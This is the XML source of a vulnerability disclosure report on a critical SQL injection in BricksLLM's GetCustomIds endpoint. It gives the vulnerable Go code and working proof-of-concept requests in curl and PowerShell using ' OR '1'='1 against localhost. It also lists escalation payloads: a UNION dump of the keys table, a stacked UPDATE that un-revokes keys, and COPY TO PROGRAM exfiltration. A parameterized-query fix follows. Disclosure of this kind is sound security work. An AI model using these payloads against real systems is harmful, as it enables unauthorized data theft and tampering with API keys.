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5E6A" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="D32F2F"/>
        </w:rPr>
        <w:t>SQLi-01: SQL Injection in GetCustomIds — keyId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2"/>
        <w:gridCol w:w="5484"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D71A7F" w14:paraId="5FD40385" w14:textId="77777777" w:rsidTr="00BA067B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          </w:tcPr>
          <w:p w14:paraId="70EEF706" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          </w:tcPr>
          <w:p w14:paraId="1A879E63" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F61BC8" w14:paraId="3293D800" w14:textId="77777777" w:rsidTr="00BA067B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          </w:tcPr>
          <w:p w14:paraId="23257DC1" w14:textId="3EE6E505" w:rsidR="00F61BC8" w:rsidRDefault="00F61BC8">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          </w:tcPr>
          <w:p w14:paraId="70561C98" w14:textId="6734A3EA" w:rsidR="00F61BC8" w:rsidRPr="00F61BC8" w:rsidRDefault="00F61BC8">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId6" w:history="1">
              <w:r w:rsidRPr="00F61BC8">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:bCs/>
                </w:rPr>
                <w:t>https://github.com/bricks-cloud/BricksLLM</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D71A7F" w14:paraId="62682726" w14:textId="77777777" w:rsidTr="00BA067B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6397F110" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5707D44B" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="D32F2F"/>
              </w:rPr>
              <w:t>CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D71A7F" w14:paraId="057F63AE" w14:textId="77777777" w:rsidTr="00BA067B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50B2B7D8" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>CVSS 3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7343A78B" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
            <w:r>
              <w:t>9.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D71A7F" w14:paraId="4EC0D027" w14:textId="77777777" w:rsidTr="00BA067B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="031FB825" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72E8242D" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE-89: SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D71A7F" w14:paraId="7F8D764C" w14:textId="77777777" w:rsidTr="00BA067B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55FE5809" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19843261" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
            <w:r>
              <w:t>GET /api/reporting/custom-ids?keyId=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D71A7F" w14:paraId="370B1F2B" w14:textId="77777777" w:rsidTr="00BA067B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71003140" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F6E56F7" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
            <w:r>
              <w:t>keyId (query string)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D71A7F" w14:paraId="4693DF2F" w14:textId="77777777" w:rsidTr="00BA067B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3372" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40B77B81" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5484" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A09D742" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
            <w:r>
              <w:t>internal/storage/postgresql/event.go, Line 275</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="094BEAB2" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Vulnerable Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4077618A" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The keyId query string parameter is interpolated directly into SQL via fmt.Sprintf — no parameterization or sanitization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE5D1C9" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F5"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>func (s *Store) GetCustomIds(keyId string) ([]string, error) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    query := fmt.Sprintf(`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    SELECT DISTINCT custom_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    FROM events</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    WHERE key_id = '%s' AND custom_id IS NOT NULL   // &lt;-- INJECTION POINT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    AND NOT custom_id = ''</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    `, keyId)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// keyId is injected directly into the SQL string via %s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    // No parameterization, no sanitization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rows, err := s.db.QueryContext(ctx, query)  // executes raw SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11ADE004" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Data Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5677C4AE" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F5"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1. HTTP request arrives:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">   GET /api/reporting/custom-ids?keyId=' OR '1'='1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>2. admin/reporting.go handler reads the query param:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">   keyId := c.Query("keyId")   // keyId = "' OR '1'='1"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>3. Passes to storage layer:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">   krm.GetCustomIds(keyId)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>4. fmt.Sprintf builds the query:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">   SELECT DISTINCT custom_id FROM events</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">   WHERE key_id = '' OR '1'='1' AND custom_id IS NOT NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">                    ^^^^^^^^^^^^^^</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">   Injected: closes quote, adds OR '1'='1' → always true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">   Returns ALL custom_ids from ALL events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC12F23" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3A2915" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF6B35"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>TESTED &amp; CONFIRMED ON 127.0.0.1:8001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B46DC86" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7886EEF9" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F5"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># PowerShell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>$wc = New-Object System.Net.WebClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>$wc.DownloadString(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">  "http://127.0.0.1:8001/api/reporting/custom-ids?keyId=' OR '1'='1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>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># cURL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>curl "http://127.0.0.1:8001/api/reporting/custom-ids?keyId=%27%20OR%20%271%27%3D%271"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8AAEAE" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Actual Server Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425C3C87" w14:textId="7D524C65" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="E8F5E9"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>Content-Type: application/json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>[""]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// Injection successful — HTTP 200 returned</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// The OR '1'='1' made the WHERE clause always true,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// causing the query to return custom_ids from ALL events.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// The empty string [""] indicates events exist but have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// no custom_id set — confirming the injection bypassed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// the original key_id filter completely.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// COMPARISON — Normal (non-injected) request:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// GET /api/reporting/custom-ids?keyId=nonexistent-key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A3A1A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>// Response: []  (empty array — no results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8EA2B0" w14:textId="5949A707" w:rsidR="00BA067B" w:rsidRDefault="00BA067B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B95B93" w14:textId="38756D93" w:rsidR="00BA067B" w:rsidRDefault="00BA067B" w:rsidP="00BA067B">
      <w:r>
        <w:t xml:space="preserve">Here is the Exploit POC using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Jsql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7909908F" w14:textId="1CAD6AEF" w:rsidR="00BA067B" w:rsidRPr="00BA067B" w:rsidRDefault="00BA067B" w:rsidP="00BA067B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43EC1CA1" wp14:editId="03F93DA8">
            <wp:extent cx="5486400" cy="2461260"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="36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9973" w14:textId="77777777" w:rsidR="00BA067B" w:rsidRDefault="00BA067B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="678ACF7F" w14:textId="54040B62" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53472DC7" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Full database read/write access. This injection point can be escalated to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB401AF" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>UNION-based extraction — dump any table: keyId=' UNION SELECT key FROM keys--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B180F9" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Stacked queries — modify data: keyId='; UPDATE keys SET revoked=false--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ADA799" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Out-of-band exfiltration — via COPY TO PROGRAM (if DB user is superuser)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55037BF0" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B67A7C" w14:textId="77777777" w:rsidR="00D71A7F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F0F0F5"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>// BEFORE (vulnerable) — event.go:272-276</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>query := fmt.Sprintf(`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>SELECT DISTINCT custom_id FROM events</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>WHERE key_id = '%s'`, keyId)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>// AFTER (safe) — use parameterized query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>query := `SELECT DISTINCT custom_id FROM events</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>WHERE key_id = $1 AND custom_id IS NOT NULL AND NOT custom_id = ''`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>rows, err := s.db.QueryContext(ctx, query, keyId)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5085A7C9" w14:textId="1832AB45" w:rsidR="00D71A7F" w:rsidRDefault="00D71A7F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00D71A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508961">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1436091623">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1202205582">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1152066519">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1975325750">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="990016773">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="436023284">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="178008728">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="139142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CCC"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00BA067B"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00D71A7F"/>
    <w:rsid w:val="00F61B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944D8"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{AAFA44AA-37DA-44DE-BB18-00E83A43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1B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ricks-cloud/BricksLL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Sandy</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-31T20:09:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>